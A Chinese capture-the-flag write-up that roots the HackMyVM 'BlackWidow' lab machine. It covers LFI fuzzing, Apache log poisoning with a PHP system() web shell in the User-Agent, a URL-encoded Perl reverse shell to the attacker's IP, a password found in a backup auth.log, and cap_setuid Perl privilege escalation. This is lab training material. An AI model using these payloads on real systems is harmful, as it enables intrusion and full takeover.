【hackmyvm】BlackWidow靶机wp
tags:
- HMV
- 日志包含
- perl-Capabilites提权
1. 基本信息^toc
这里写目录标题
- 1. 基本信息^toc
- 2. 信息收集
- 2.1. 端口扫描
- 2.2. 目录扫描
- 2.3. FUZZ测试LFI
- 2.4. 日志包含getshell
- 3. 提权viper用户
- 4. 提权root
- 4.1. 提权检测
- 4.2. perl & Capabilities提权
靶机链接 https://hackmyvm.eu/machines/machine.php?vm=BlackWidow
作者 0xJin
难度 ⭐️⭐️⭐️⭐️️
2. 信息收集
2.1. 端口扫描
┌──(root㉿kali)-[~/Desktop/hmv/blackwindow]
└─# nmap -sCV 192.168.56.23 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-23 23:37 EST
Nmap scan report for 192.168.56.23
Host is up (0.00068s latency).
Not shown: 65526 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 f8:3b:7c:ca:c2:f6:5a:a6:0e:3f:f9:cf:1b:a9:dd:1e (RSA)
| 256 04:31:5a:34:d4:9b:14:71:a0:0f:22:78:2d:f3:b6:f6 (ECDSA)
|_ 256 4e:42:8e:69:b7:90:e8:27:68:df:68:8a:83:a7:87:9c (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 37465/tcp6 mountd
| 100005 1,2,3 53071/udp mountd
| 100005 1,2,3 54401/tcp mountd
| 100005 1,2,3 56526/udp6 mountd
| 100021 1,3,4 34897/tcp nlockmgr
| 100021 1,3,4 46505/tcp6 nlockmgr
| 100021 1,3,4 50253/udp nlockmgr
| 100021 1,3,4 53399/udp6 nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
2049/tcp open nfs 3-4 (RPC #100003)
3128/tcp open http-proxy Squid http proxy 4.6
|_http-server-header: squid/4.6
|_http-title: ERROR: The requested URL could not be retrieved
34897/tcp open nlockmgr 1-4 (RPC #100021)
40851/tcp open mountd 1-3 (RPC #100005)
51017/tcp open mountd 1-3 (RPC #100005)
54401/tcp open mountd 1-3 (RPC #100005)
MAC Address: 08:00:27:41:EE:2C (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.98 seconds
2.2. 目录扫描
192.168.56.23 首页
是一张图片。查看源代码 没有发现隐藏的信息
对 192.168.56.23 进行目录扫描
┌──(root㉿kali)-[~/Desktop/hmv/blackwindow]
└─# dirsearch -u http://192.168.56.23 -x 403
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/Desktop/hmv/blackwindow/reports/http_192.168.56.23/_24-12-23_23-45-37.txt
Target: http://192.168.56.23/
[23:45:37] Starting:
[23:45:37] 301 - 311B - /js -> http://192.168.56.23/js/
[23:45:44] 301 - 316B - /company -> http://192.168.56.23/company/
[23:45:45] 301 - 313B - /docs -> http://192.168.56.23/docs/
[23:45:45] 200 - 404B - /docs/
[23:45:48] 200 - 403B - /js/
Task Completed
访问 /company 路由是一个网站的首页
查看源代码,发现提示
提示告诉我们有一个php文件,可以使用 file 参数进行文件包含
继续对 /company 路由进行目录扫描
┌──(root㉿kali)-[~/Desktop/hmv/blackwindow]
└─# gobuster dir -u http://192.168.56.23/company/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.23/company/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 278]
/assets (Status: 301) [Size: 323] [--> http://192.168.56.23/company/assets/]
/forms (Status: 301) [Size: 322] [--> http://192.168.56.23/company/forms/]
/changelog.txt (Status: 200) [Size: 1175]
/Readme.txt (Status: 200) [Size: 222]
/.php (Status: 403) [Size: 278]
/started.php (Status: 200) [Size: 42271]
扫描出来了一个 started.php
测试一下是否是这个php文件存在文件包含
尝试进行最简单的文件包含 发现没有回显。
2.3. FUZZ测试LFI
测试一下fuzz
┌──(root㉿kali)-[~/Desktop/hmv/blackwindow]
└─# ffuf -u http://192.168.56.23/company/started.php?file=FUZZ -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest-huge.txt |grep -v 'Size: 0'
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://192.168.56.23/company/started.php?file=FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest-huge.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 1582, Words: 15, Lines: 30, Duration: 6ms]
../../../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 1582, Words: 15, Lines: 30, Duration: 8ms]
../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 1582, Words: 15, Lines: 30, Duration: 8ms]
../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 1582, Words: 15, Lines: 30, Duration: 12ms]
../../../../../../../../../../../../../../../../etc/passwd [Status: 200, Size: 1582, Words: 15, Lines: 30, Duration: 14ms]
../../../../../../../../../../../../../etc/group [Status: 200, Size: 727, Words: 1, Lines: 56, Duration: 1ms]
../../../../../../../../../../../../../../../../../../etc/group [Status: 200, Size: 727, Words: 1, Lines: 56, Duration: 4ms]
../../../../../../../../../../../../../../../../etc/group [Status: 200, Size: 727, Words: 1, Lines: 56, Duration: 4ms]
../../../../../../../../../../../../../../etc/group [Status: 200, Size: 727, Words: 1, Lines: 56, Duration: 5ms]
原来这个目录位于很深处,所以需要很多个 ../
┌──(root㉿kali)-[~/Desktop/hmv/blackwindow]
└─# curl http://192.168.56.23/company/started.php?file=../../../../../../../../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
viper:x:1001:1001:Viper,,,:/home/viper:/bin/bash
_rpc:x:107:65534::/run/rpcbind:/usr/sbin/nologin
statd:x:108:65534::/var/lib/nfs:/usr/sbin/nologin
2.4. 日志包含getshell
我们先查看是否可以访问apache的日志
可以访问。 我们构造恶意的UA进行注入
┌──(root㉿kali)-[~/Desktop/hmv/blackwindow]
└─# curl http://192.168.56.23/ -A "<?php system(\$_GET['cmd']);phpinfo();?>"
<html>
<img src="wallpaper.jpg" alt="wallpaper" width="100%" height="100%">
</html>
再访问日志可以发现已经注入木马了
反弹shell
curl http://192.168.56.23/company/started.php?file=../../../../../../../../../../../../../../var/log/apache2/access.log&cmd=perl%20-e%20%27use%20Socket%3B%24i%3D%22192.168.56.6%22%3B%24p%3D1234%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bif%28connect%28S%2Csockaddr_in%28%24p%2Cinet_aton%28%24i%29%29%29%29%7Bopen%28STDIN%2C%22%3E%26S%22%29%3Bopen%28STDOUT%2C%22%3E%26S%22%29%3Bopen%28STDERR%2C%22%3E%26S%22%29%3Bexec%28%22%2Fbin%2Fbash%20-i%22%29%3B%7D%3B%27
┌──(root㉿kali)-[~/Desktop/hmv/blackwindow]
└─# pwncat-cs -lp 1234
[00:13:04] Welcome to pwncat 🐈! __main__.py:164
[00:14:36] received connection from 192.168.56.23:36872 bind.py:84
[00:14:36] 192.168.56.23:36872: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@blackwidow:/var/www/html/company$
3. 提权viper用户
我这里上传了Linpeas进行检测 ,但是没有发现可以直接利用的地方
看了一下wp 发现ssh认证日志 auth.log 被备份在了 /var/backups/ 目录
而且我们可以可以进行查查看
(remote) www-data@blackwidow:/var/backups$ ls -l /var/log/auth.log
-rw-r----- 1 root adm 17565 Dec 24 00:32 /var/log/auth.log
(remote) www-data@blackwidow:/var/backups$ ls -l auth.log
-rw-r--r-- 1 root root 31646 Dec 13 2020 auth.log
可以发现,正常情况下。
auth.log在/var/log目录,而且普通用户无法查看
然后在日志里面可以找到一个viper用户的密码 ?V1p3r2020!?
Dec 12 16:56:43 test sshd[29560]: Invalid user ?V1p3r2020!? from 192.168.1.109 port 7090
(remote) www-data@blackwidow:/var/backups$ su viper
Password:
viper@blackwidow:/var/backups$
viper@blackwidow:~$ cat local.txt
d930fe79919376e6d08972dae222526b
我估计是viper用户把密码当成用户名了
4. 提权root
4.1. 提权检测
viper@blackwidow:/tmp$ /sbin/getcap -r / 2>/dev/null
/home/viper/backup_site/assets/vendor/weapon/arsenic = cap_setuid+ep
/usr/bin/perl =
/usr/bin/perl5.28.1 =
/usr/bin/ping = cap_net_raw+ep
/usr/lib/squid/pinger = cap_net_raw+ep
发现 arsenic 具有 cap_setuid 具有 cap_setuid 即允许进程更改其有效用户 ID。
查看一下 arsenic 的帮助文档
viper@blackwidow:~/backup_site/assets/vendor/weapon$ ./arsenic -h
Usage: ./arsenic [switches] [--] [programfile] [arguments]
-0[octal] specify record separator (\0, if no argument)
-a autosplit mode with -n or -p (splits $_ into @F)
-C[number/list] enables the listed Unicode features
-c check syntax only (runs BEGIN and CHECK blocks)
-d[:debugger] run program under debugger
-D[number/list] set debugging flags (argument is a bit mask or alphabets)
-e program one line of program (several -e's allowed, omit programfile)
-E program like -e, but enables all optional features
-f don't do $sitelib/sitecustomize.pl at startup
-F/pattern/ split() pattern for -a switch (//'s are optional)
-i[extension] edit <> files in place (makes backup if extension supplied)
-Idirectory specify @INC/#include directory (several -I's allowed)
-l[octal] enable line ending processing, specifies line terminator
-[mM][-]module execute "use/no module..." before executing program
-n assume "while (<>) { ... }" loop around program
-p assume loop like -n but print line also, like sed
-s enable rudimentary parsing for switches after programfile
-S look for programfile using PATH environment variable
-t enable tainting warnings
-T enable tainting checks
-u dump core after parsing program
-U allow unsafe operations
-v print version, patchlevel and license
-V[:variable] print configuration summary (or a single Config.pm variable)
-w enable many useful warnings
-W enable all warnings
-x[directory] ignore text before #!perl line (optionally cd to directory)
-X disable all warnings
Run 'perldoc perl' for more help with Perl.
在Gpt的帮助下,认为这个这个程序应该就是一个Perl,可以允许Perl脚本
4.2. perl & Capabilities提权
https://gtfobins.github.io/gtfobins/perl/#capabilities
viper@blackwidow:~/backup_site/assets/vendor/weapon$ vi getroot.pl
viper@blackwidow:~/backup_site/assets/vendor/weapon$ ./arsenic getroot.pl
# cat getroot.pl
use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";
# whoami
root
# cat /root/root.txt
▄▄▄▄· ▄▄▌ ▄▄▄· ▄▄· ▄ •▄ ▄▄▌ ▐ ▄▌▪ ·▄▄▄▄ ▄▄▌ ▐ ▄▌
▐█ ▀█▪██• ▐█ ▀█ ▐█ ▌▪█▌▄▌▪ ██· █▌▐███ ██▪ ██ ▪ ██· █▌▐█
▐█▀▀█▄██▪ ▄█▀▀█ ██ ▄▄▐▀▀▄· ██▪▐█▐▐▌▐█·▐█· ▐█▌ ▄█▀▄ ██▪▐█▐▐▌
██▄▪▐█▐█▌▐▌▐█ ▪▐▌▐███▌▐█.█▌ ▐█▌██▐█▌▐█▌██. ██ ▐█▌.▐▌▐█▌██▐█▌
·▀▀▀▀ .▀▀▀ ▀ ▀ ·▀▀▀ ·▀ ▀ ▀▀▀▀ ▀▪▀▀▀▀▀▀▀▀• ▀█▄▀▪ ▀▀▀▀ ▀▪
Congrats!
You've rooted Black Widow!
0xJin - mindsflee
Follow on Instagram: 0xjiin
Follow on Twitter: 0xJin , @mindsflee
0780eb289a44ba17ea499ffa6322b335